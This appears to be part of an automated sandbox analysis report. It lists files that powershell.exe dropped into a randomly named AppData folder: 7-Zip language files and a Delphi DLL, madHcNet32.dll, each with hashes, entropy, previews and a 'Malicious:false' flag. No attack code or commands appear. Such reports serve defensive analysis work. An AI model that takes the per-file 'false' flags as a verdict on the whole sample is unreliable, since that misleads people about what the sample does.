                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8746
                                                                                                                                                          Entropy (8bit):5.21465180545354
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7vbGuJ7kBfcLpMPz89Pwkr5fXnNB3RQMFWdZtffvTqBmV4jLASZE33txMF:7vbrJ7k+Lpy8ukr5fXnNXxFaWBm4jLAu
                                                                                                                                                          MD5:F361950B7D1BB073EF48CA729B7ED5EA
                                                                                                                                                          SHA1:8C5D3FB8E09C9682C6256F05F82CA67C58F0FF2B
                                                                                                                                                          SHA-256:F4F9D6DFD36512F027452499B083AD0656DF6503CE03E4E4CC45B925F1F1D678
                                                                                                                                                          SHA-512:6163FB77D3155525A563AD907CDF48FA18A6CE019A073C7D9DC2438927217D0D8534ADA7FC444114F14AC216C89D12E83F5B582021BE693BAEC80BD69199909E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 19.02 : 2019-11-12 : Stef.n .rvar Sigmundsson..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Icelandic...slenska..401... lagi..H.tta vi.........&J...&Nei..&Loka..Hj.lp....&Halda .fram..440..&J. vi. .llu..&Nei vi. .llu..St..va..Endurr.sa..&Bakgrunnur..&Forgrunnur..&Gera hl.... hl.i..Ert .. viss um a. .. viljir h.tta vi.?..500..&Skr...&Breyta..&Sko.a..&Upp.hald..&Verkf.ri..&Hj.lp..540..&Opna..&Opna a. innanver.u..&Opna a. utanver.u..&Sko.a..&Breyta..&Endurnefna..&Afrita ......&F.ra ......&Ey.a..&Klj.fa skr......&Sameina skr.r.....&Eiginleikar..&Gera athugasemd.....Reikna samt.lu..Mismunur..Skapa m.ppu..Skapa skr...&H.tta..Tengill..&V.xlstraumar..600..&Velja allt..&Afvelja allt..&Umsn.a vali..Velja.....Afvelja.....Velja eftir tegund..Afvelja eftir tegund..700..&St.rar t.knmyndir..&Sm.ar t.knmyndir..&Listi..&Sm.atri.i..730...flokka...Flats.n..&2 spj.ld..&Verkf.rastikur..Opna r.tarm.ppu..Upp um eitt stig..M.ppusag

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\it.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9712
                                                                                                                                                          Entropy (8bit):4.869238753382525
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iqlpzc7zUwLkm5g6dLeUPezxs+GGWFP2oJhD0k8nv8C/PZmvmVxPdYjgl0h24oUf:imzo15g6cUPim+GGWVJhSvNP6mVxPdYP
                                                                                                                                                          MD5:87EFE148B443C6B50EAB945E27F9B39A
                                                                                                                                                          SHA1:D4A46F9A798C381A7415DE8B74B296F5632124C1
                                                                                                                                                          SHA-256:DD0A9A9CE33D25A9F6C461A6E43721E975B8B1E189C3D5B81F1DAD0FF12870BE
                                                                                                                                                          SHA-512:3F391E6C840EA267F500E7912E87E8696099AEE683A0A656A97033DEC8DE38F875C60DC21E9332A7E24CA3E2AE8C404FD936F915AD8C8A05EAB090C355916DD1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.07 : Leandro Spagnol..; : Vincenzo Reale (some corrections)..; 15.05 : 2015-06-17 : TJL73 : http://tjl73.altervista.org/..; 15.05 : 2017-02-01 : Massimo Castiglia..;..;..;..;..;..;..;..0..7-Zip..Italian..Italiano..401..OK..Annulla........&S...&No..&Chiudi..Aiuto....&Continua..440..S. per &tutti..No per t&utti..Stop..Riavvia..&In background..In p&rimo piano..&Pausa..In pausa..Sei sicuro di voler annullare?..500..&File..&Modifica..&Visualizza..&Preferiti..&Strumenti..&Aiuto..540..&Apri..Apri in &7-Zip File Manager..Apri con &un altro programma..&Visualizza..Modifica con l'&editor predefinito..Rino&mina..&Copia in.....&Sposta in.....&Elimina..&Suddividi il file.....&Unisci i files.....&Propriet...Comme&nto.....Calcola chec&ksum..Comparazione differenze (Diff)..Crea Cartella..Crea File..E&sci..Link..Streams &alternativi..600..Selezion&a tutto..&Deseleziona tutto..&Inverti selezione..Seleziona.....Deseleziona.....Seleziona per tipo..Deseleziona per tipo..7

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ja.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11839
                                                                                                                                                          Entropy (8bit):5.332273180318382
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i5bovSMlRAuVo6k8FUW7Plm6eAY/yCIQ4YftM40EZwGltXuWRzoaGN:i5svH80I8B1Y/C40yXRRzoaGN
                                                                                                                                                          MD5:470B0CA449E9F34BB34244A7EF39441B
                                                                                                                                                          SHA1:471C37014EFF0214CE757B6E88987FB9E2B31931
                                                                                                                                                          SHA-256:B0150C2B3D2AD9B37A7F47A24466AEA4A56CED728CAF12D02B407FD0080602AB
                                                                                                                                                          SHA-512:1E2D690E484449FA4859836F7AB880D512E98E5F996BF679ECB3A5C3CA8A3FC7E9FED4E6C2470FFF790CE22BB6AA407D951EC6C7CED571B5AC8E86CA873F3AFA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : : Komuro..; : : Mick..; : : 2chBBS-software..; : : Crus Mitsuaki..; 9.23 : 2011-06-22 : nabeshin..; 15.00 : 2015-04-30 : Stepanushkin Dmitry..; 19.00 : 2019-02-22 : Rukoto Luther..;..;..;..;..0..7-Zip..Japanese.......401..OK.................(&Y).....(&N).....(&C)...........(&C)..440.......(&A)........(&L)...................(&B)..........(&F)......(&P)......................?..500......(&F)....(&E)....(&V).......(&A).....(&T).....(&H)..540....(&O)..7-Zip ...(&I).........(&U)....(&V)....(&E).......(&M).....(&C).......(&M).......(&D)........(&S)...........(&B)..........(&R)......(&N)..............

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ka.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18205
                                                                                                                                                          Entropy (8bit):3.5734503314271655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ikzn3UlfDnVKqnB+C0aHgtyr6g5W0p5rUbVkmUmqIcR5mFuBUPNIazj:7sMW6gnAbVkmUm3
                                                                                                                                                          MD5:EB2AF4DC4C28275AE1876523944D708E
                                                                                                                                                          SHA1:BFB87569112A081A99ECD5BFDCC6F2AEAD07F67B
                                                                                                                                                          SHA-256:B78DEFEC49D07120B74C2172F3E07540314771B16729C6BBFC3A1902ECE2EDA0
                                                                                                                                                          SHA-512:E04680A6050FC6B3D0BF50A092F5FE2049BEDF705F479FB5C45852E4CC19D1B735B85166DA15EA67DBEB3AACF39DBE6C80EDA9D4C180805D87762468875AB49A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.23 : 2011-09-25 : Translated by Giorgi Maghlakelidze, original translation by Dimitri Gogelia, ..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Georgian...........401..OK..................&......&.....&......................&............440...... &................ ...&.............................&.........&.... ........&..........&..................... ..... .......... ........?..500..&.......&............&.......&.........&.............&...........540..&.............. &.............. ..&.......&..

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\kaa.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8102
                                                                                                                                                          Entropy (8bit):5.104223410120957
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iGKztgVKxXfv5NKHLm9ufAX7M5amaRi5WsU1Ok/VO1ri:iGStuYXfvBXQiuWslk/sBi
                                                                                                                                                          MD5:DFBA5C2185E113EEF167A5E21C32DF76
                                                                                                                                                          SHA1:E36703D7D1954E3F1729A0497674EC15C41A2F76
                                                                                                                                                          SHA-256:4D631602CE3D0C4D9162AF6BF56A90C8EEF75A24D556B729191B62F79ABA0681
                                                                                                                                                          SHA-512:3271B66114BD6F145693258C5E84A175ACB3DB865169734A9BEB5DE7F9AEFD06B4144650DC0E98FD47DD38AD3CABD26415640CDDC8AC611C23D14487E975FB70
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Atabek Murtazaev..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Karakalpak - Latin..Qaraqalpaqsha - Lat.n..401..OK..Biykar etiw........&Awa..&Yaq..&Jab.w..Ja'rdem....&Dawam etiw..440..&Barl.g'.na awa..Ba&rl.g'.na yaq..Toqtat.w..Qaytadan baslaw..&Artq. fong'a..Ald.ng'. &fong'a..&Pauza..Pauza q.l.ng'an..An.q biykar etiwdi qa'leysizbe?..500..&Fayl..&Du'zetiw..&Ko'rinis..&Sayland.lar..A's&baplar..&Ja'rdem..540..&Ash.w..&.shinde ash.w..&S.rt.nda ash.w..&Ko'riw..&Du'zetiw..At.n o'&zgertiw..Bul jerge &nusqas.n al.w.....Bul jerge ko'shiriw.....O'shiriw..&Fayld. bo'liw.....Fayllard. &biriktiriw.....Sazlawla&r..Kom&mentariy.....Qadag'alaw summas...Diff..Papka jarat.w..Fayl jarat.w..Sh&.g'.w..600..Barl.g'.n &saylaw..Saylawd. al.p taslaw..Saylawd. &teris awdar.w..Saylaw.....Saylawd. al.p taslaw.....Tu'ri boy.nsha saylaw..Tu'ri boy.nsha saylawd. al.p taslaw..700..U'&lken ikonalar..Kishi &ikonalar..&Dizim..&Keste..730..Ta'rtipsiz..Te

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\kab.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8592
                                                                                                                                                          Entropy (8bit):5.231781574254223
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iFKQ2IdVUQs/gSSmlPgUulpuDUed3JhFyglCxCxqJo+Msp04ndCVv:iY7IrsgSSmlPgXpUUed3Jh8FCxaB/dCF
                                                                                                                                                          MD5:C6AC7AAD8BCE83AC69F197DB9D4529F8
                                                                                                                                                          SHA1:5FA31CCFA23B753CEE7AEE7EE65915AAA94F9B01
                                                                                                                                                          SHA-256:B8A7A5182DFDACC9BACCB412E161C60864D3B5D30038935122C736AE4F4EBC22
                                                                                                                                                          SHA-512:A643E38A5801A50FD318FEFEB0245B8935C818737B860839C15FA09B0CC0E9EF55EB455E3CEAF8B2263AE23B5BEFD1E6013BA63C4ABD1B89627905498FF026BE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2018-02-27 : Belkacem Mohammed..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kabyle..Taqbaylit..401..IH..Sefsex........&Ih..&Uhu..&Mdel..Tallelt....&Kemmel..440..Ih i &Me..a..Uhu i M&e..a..Se.bes..Ales tanekra..&Agilal..&A.awas Amezwaru..&R.u..I.bes..Teb.i. ad tsefsxe.?..500..A&faylu..&.reg..&Sken..I&nurifen..&Ifecka..&Tallelt..540..&Ldi..Ldi deg &ugensu..Ldi di B&erra..&Sken..&..eg..Snif&el Isem..&N.el .er.....&Senkez .er.....&Kkes..&B.u Afaylu.....Sdu&kkel ifuyla.....A&ylan..Awenn&it.....Timernit n Usenqed..Ice..iq..Snulfu-d Akaram..Snulfu-d Afaylu..F&fe...Ase.wen..&Alternate Streams..600..Fren &Me..a..Kkes Afran i Me..a..&Tti Afran..Fren.....Kkes Afran.....Fren s Tawsit..Kkes Afran s Tawsit..700..Tig&nitin Timeqranin..T&ignitin Time.yanin..&Tabdart..&Talqayt..730..Ur Yettwafren ara..Askan Imlebbe...&2 Igalisen..&Ifeggagen n Ifecka..Ldi Akaram Agejdan..Yiwen Uswir d Asawen..Amazray n Ikaramen.....&Smiren..Asmir

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\kk.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10732
                                                                                                                                                          Entropy (8bit):4.659322147322825
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iwHw0jjl8sq/UDEAY40JI0lkMPK+K4ppfdMMda764a:iwHw0jjiRUD8kMPJqMdj4a
                                                                                                                                                          MD5:F4C46B450A580AD5ABF0B638DCDCC6FB
                                                                                                                                                          SHA1:750DFDDDDADEE9CFE0E8F651F1C6CC38CF1FCD78
                                                                                                                                                          SHA-256:F2E6E55C102485E232DAAD00F68D8905F7A54F8AE2128DB6AFE25231C17ACD69
                                                                                                                                                          SHA-512:24B6DC7B491302B905C1E20E67DDAB16AF9420820B6C83406618E017FA84D952661087E2EA577831441E8A3C82EF697DE713597E33626AED787F3485DD9B1F7D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Arslan Beisenov, Arman Beisenov..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kazakh...........401............................&....&.....&..................&............440........ &.......... &................... .... ......&.......&....... ..........&............................ ....... ..... ..?..500..&......&.......&.........&...........&.......&..........540..&........... &............. ............&............ ......&...........&............&........... .................... .............................&.................. ........Diff..&..... ........... .............600....... ...................... ....

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ko.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9900
                                                                                                                                                          Entropy (8bit):5.617543855498878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i36rCE/KKcFaeVLs7sdGBbeO9onv40if8Knv3E3q9FGdUBUe:i6CE/KKcQSLsJbeOqti0KvoAGdqUe
                                                                                                                                                          MD5:55E8685AC21571F0B5F11A4D5FA088F9
                                                                                                                                                          SHA1:285D09B7A8ADCAB4E5D72928487C711B8F48B8FB
                                                                                                                                                          SHA-256:58A2DD10438C1199653C1BCD88C520DDB437FA8E01BCF311130ADA0A626151C7
                                                                                                                                                          SHA-512:BD95E5F82E17494404E7319F5CDC1B4BDD868B2AE73BE1CF407F9F1E54B360BF75A36993A60A14D29E4AF3EC15E0538F23E1F22DCA1153BD01FC0BA964390337
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : ZannyLim (...)..; : bzImage..; 4.52 : Hyeong il Kim (kurt Sawyer)..; 9.07 : Dong-yoon Han (...)..; 15.12 : Winterscenery (Ji-yong BAE)..; 16.04 : Add translation and Modify by Winterscenery (Ji-yong BAE)..;..;..;..;..;..0..7-Zip..Korean.......401.................(&Y).....(&N)....(&C)...........(&C)..440.... .(&A).... ...(&L)........ ...... ...(&B).... ...(&F)......(&P)...... ...... ........?..500....(&F)....(&E)....(&V)......(&A)....(&T).....(&H)..540....(&O).... ..(&I).... ..(&U).... ..(&V)....(&E)... ..(&M)....(&C).......(&M).......(&D).... ...(&S)....... ...(&B).......(&R)....(&N)........ ...... ...... ....... ........(&X)........ ... ...(&A

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ku-ckb.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12360
                                                                                                                                                          Entropy (8bit):4.546190162778464
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:igHCpEmyIRe0g/OQMEuDP9Y799boVTiUaml4hSf7UAlA+cA90s5bKlcRBfwCiIEW:ivjQMTDShMTiUaTSfwA90sglMRMj2z/
                                                                                                                                                          MD5:C90D029172A8533946EF7419BF383305
                                                                                                                                                          SHA1:7B3D96899F5935E559626D215517315C04207627
                                                                                                                                                          SHA-256:19AF39960142B8599153A09EF4F03F944FC00999BEB9FE2399F5F8B236716EEF
                                                                                                                                                          SHA-512:B0A711161CE233E5B9231C21ABFD721BCA6A85567DEBC6CC9C033C68D0A6E1292F369DBF1EA52B4088658D13263C245EA37752E87ABD8B2AA878B5270EF0B1BE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Ara Bakhtiar..; 4.66 : Ara Qadir : http://www.chawg.org..;..;..;..;..;..;..;..;..;..0..7-Zip..Kurdish - Sorani.........401.............................&......&.......&...................&..............440...... .. &............ .. ..&..............................&............&..........&......................... .. ................500..&......&..........&........&...........&............&.........540..&................ ..&... ............. .. &........&.......&..........&..........&............ .......&......... .......&.........&........ ..........&...... ....... .............&...................&............

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\ky.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12614
                                                                                                                                                          Entropy (8bit):4.649736068304655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ikVDGPB8R8wedC+GwW2womKx4rXNMQOpR2avWPYx3jqSxv:78Z8+7CS8uiMkARuSN
                                                                                                                                                          MD5:7D0420EE265C9122DC11EF964871E179
                                                                                                                                                          SHA1:4B84B209E5A637869E501D54FF0B535BD3924851
                                                                                                                                                          SHA-256:4EF68FBD8AB002BBF4CD6D1C9FD6D87A5FDE048AFD2EF162B727259EB97D70D2
                                                                                                                                                          SHA-512:0DDCD7871E61B76ACF3FA0224519ED8E29C33234C300097F69E799951F8F9E87943A4F755F1362856F0C2A3804C399E466CF08CF0E189EC7BCDF744E07C61635
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.20 : Kalil uulu Bolot..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kyrgyz............401..OK...............&......&.....&.................&.........440...... &............ .&...... .................. .........&.......&....... ........&....................... ... ... .......... ........... ..... ......?..500..&......&.......&......&............&.......&........540..&.........&... ...........&... .............&.................& ..........&.... ............&.... ..... ............&..........&... ................&........ .............&...........&.................. ..........Diff..&...... ............&. ......

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\lij.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7882
                                                                                                                                                          Entropy (8bit):5.013331648035662
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iIxLxXfim7pf7nJePcyzqBJv3/gxqwP95y:iIxLxXTFDnxoxqwP94
                                                                                                                                                          MD5:372BC4A26B676C48CF8FEFAB3711B91D
                                                                                                                                                          SHA1:39DA7AC5A483BD675657C24F875C2CEE93204A1E
                                                                                                                                                          SHA-256:431CAE1BB77633FDF3CE339E97BC5D5D885779DECC01ED03583E381F097A2487
                                                                                                                                                          SHA-512:0BF4DED969BC2AF21B806FEA241B7F0A312D8D4D9C81B14293E352E09DC31B3B876C77C155B6C9769D89B169D8DE65C4F52B649ACBF90AF14E75CCD6BB8157DF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : GENOVES.com.ar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Ligurian..Zeneize..401..D'ac.rdio..Anulla........&Sci..&No..S.&ra..Agiutto....&Continoa..440..Sci pe &Tutti..No pe T&utti..Ferma..Inandia torna..Into &sfondo..&In primmo cian..&Paoza..In paoza..Ti . seguo de voei anul.?..500..&Archivio..&Modifica..&Vixoalizza..&Preferii..&Strumenti..A&giutto..540..&Arvi..Arvi into Manezat. d'archivi 7-Zip..Arvi inte Explorer..&Vixoalizza..&Modifica..Ri&nomina..&C.pia inte.....&Sp.sta inte.....Scancel&la..&Dividi l'archivio.....&Unisci i archivi.....P&ropiet...Comen&ta.....Calcola somma de contr.llo..Dif..Crea cartella..Crea archivio..Sc&i.rti..600..Sele.ionn-a &tutto..Desele.ionn-a tutto..In&verti sele.ion..Sele.ionn-a.....Desele.ionn-a.....Sele.ionn-a pe tipo..Desele.ionn-a pe tipo..700..Figue &grende..Figue picinn-e..&Listin..&D.ti..730..Nisciun ordine..Vista ciatta..&2 barco.n..Bare di &Strumenti..Arvi cartella prin.ip...Livello supei...Crono

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\lt.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9607
                                                                                                                                                          Entropy (8bit):5.125178074314148
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:inIsB9j4K01iwimxhiZ8yczB7XhyyYR1gQEfo9GcC7MDc:inIsyiwnhiZ1czn9YwQuZ7MDc
                                                                                                                                                          MD5:92D03523DD0E7E7B2862A6396ABAD455
                                                                                                                                                          SHA1:EA1FC2BAC5AB8D5EE329A5945F1ED90269CB7AEC
                                                                                                                                                          SHA-256:C5DA5B37BE32FA4CDD8B938D479C0327B84C9F83C948EB7E65F4DDC15A6BEEAE
                                                                                                                                                          SHA-512:1FB0AE4117DD69418ECC371F699630D79F89DAAA3099F57EBFA4A7DE398CBDEF095E0B029A547DFB6936A336A9E2748B880EC83A65554A1858F2F87104D63E27
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 2.30 : Marius Navickas : http://www.teisininkas.lt/ivairus/7-zip:..; 4.57 : Domas Jokubauskis..; 15.05 : Vaidas777 (termin. .altinis: www.ra.tija.lt)..;..;..;..;..;..;..;..;..0..7-Zip..Lithuanian..Lietuvi...401..Gerai..At.aukti........&Taip..&Ne..&U.daryti..Elektroninis .inynas....&T.sti..440..T&aip Visiems..Ne v&isiems..Sustabdyti..I. naujo..&Fone..&Pirminis procesas..&Laikinai sustabdyti..Laikinai sustabdyta..Ar j.s esate tikri, kad norite at.aukti?..500..&Failas..K&eisti..&Rodyti..M.gi&amiausi...ran&kiai..&Elektroninis .inynas..540..&Atverti..Atverti v&iduje..Atverti i.&or.je..&Rodyti..K&eisti..Pervadi&nti..&Kopijuoti ......&Perkelti .......alin&ti..&Skaidyti fail......Jungti &failus.....Savy&b.s..Kome&ntuoti..Skai.iuoti kontrolin. sum...Sulyginti..Sukurti aplank...Sukurti fail...I.ei&ti..Nuoroda..&Alternatyv.s srautai..600..Pa.ym.ti &visk...Nu.ym.ti visk...Atv&irk.tinis .ym.jimas..Parinkti.....At.ym.ti.....Pasirinkti

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):943472
                                                                                                                                                          Entropy (8bit):6.691167848639275
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:TlUbWq3/gquYUJ4Vgv0eUnDaE0efxfXT95:pUR4quYUJ4VgceXE0gxfjv
                                                                                                                                                          MD5:D22B9DA713AB36102C9C3D812AF8C12D
                                                                                                                                                          SHA1:371FDBF6AE6A9A2E5C0560FC94EBA3290028A252
                                                                                                                                                          SHA-256:95B538B47E02D0AD2BD15D47EFC18695D5E379EF61568B81EF405773D9C199BB
                                                                                                                                                          SHA-512:E5AE51F79403358AF60BB3EA663251BADAC57414813F5537D763B0B95504A393FB2D34C94C4B7328EC13F58E74A7147D3A72E63E62973C4C5D80671BE1C8FACE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....P.[.................R..........4j.......p....`J....................................................................:....`...0......................pk...........................................................i...............................text...tE.......F.................. ..`.itext..`....`.......J.............. ..`.data...\x...p...z...V..............@....bss.....c...............................idata...0...`...2..................@....didata.............................@....edata..:...........................@..@.rdata..D...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@........................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mk.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8934
                                                                                                                                                          Entropy (8bit):4.259244159879149
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ia3g0F7SHayJ5vKVEB3Bxg5GteGIxpWNMll39oWvt/i4drxJ4MrZEXSW:iWg0zyJlKVEB3A6SM2mWvt/i4dtJ4MNO
                                                                                                                                                          MD5:71D42ABE45803AC9C3DA5FCACF9CC59C
                                                                                                                                                          SHA1:98A1049906972ABB480ABAF1F5658C1B8C10F27C
                                                                                                                                                          SHA-256:78F5CB9345AB258CF745EAA90D44C7A7A73D3FE06EA182B1298A989135FFA11F
                                                                                                                                                          SHA-512:A0096575D6F911CC2600DAC93D6FD7AA8D9E2F9F71A92571A76996FB4C47BDB714BBA453C862B3F42CC5F4BAAF2AED1DFF3C9D6F84A3E2053FF2037C56AB85A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.09 : Gabriel Stojanoski..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Macedonian..............401....................&....&....&...................&.........440.... &........ .&............................&........&........&...................... ....... ...... .. ........?..500..&..........&.......&........&.........&........&.......540..&.............. &.............. &........&........&.......&.............&....... .......&........ .......&.........&...... ................&....... .............&.................&.................... .................... ..........&........600............ &................ ...

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mn.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8680
                                                                                                                                                          Entropy (8bit):4.552914713447724
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i2GVqAYj834yHocynU6GwgeBLHvNlIfYfFCkMupHCwFxhjPQtQP1d/R1JTPUJ:i7kIYfUjuZxhDDHZQJ
                                                                                                                                                          MD5:8756027ADF94B3CC3D6C42F0D3FB4AF0
                                                                                                                                                          SHA1:823BDBC5ABF1D2F3528AA319A417EE090D1C6928
                                                                                                                                                          SHA-256:CF5245D17224F85011ED85062957DBFD936DD760A214980FC8F2EB69E6BA3CFC
                                                                                                                                                          SHA-512:92715A814D24318533BA26AF542B174DF12E5D8CD40251BC27890345EB6C64D174448745B2B138BD0A7E0FA0D96B803FAB9B29F89767729E64A95B164FB27F29
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.12 : Bayar..; : Bayarsaikhan..;..;..;..;..;..;..;..;..;..0..7-Zip..Mongolian........ .....401...................&......&......&.................&............440.....&. .......... .&................ .........&.. ......&.... .....&... ......... ........... ....... ..... ... ..... ..?..500..&......&.......&..........&..... ......&............&.........540..&........... &........... &......&.......&.............. .&............ &................. &.........&........&.... .................... ............&........ .........&................ ............ ..........&.....600......... ..&.............. .......&......... .

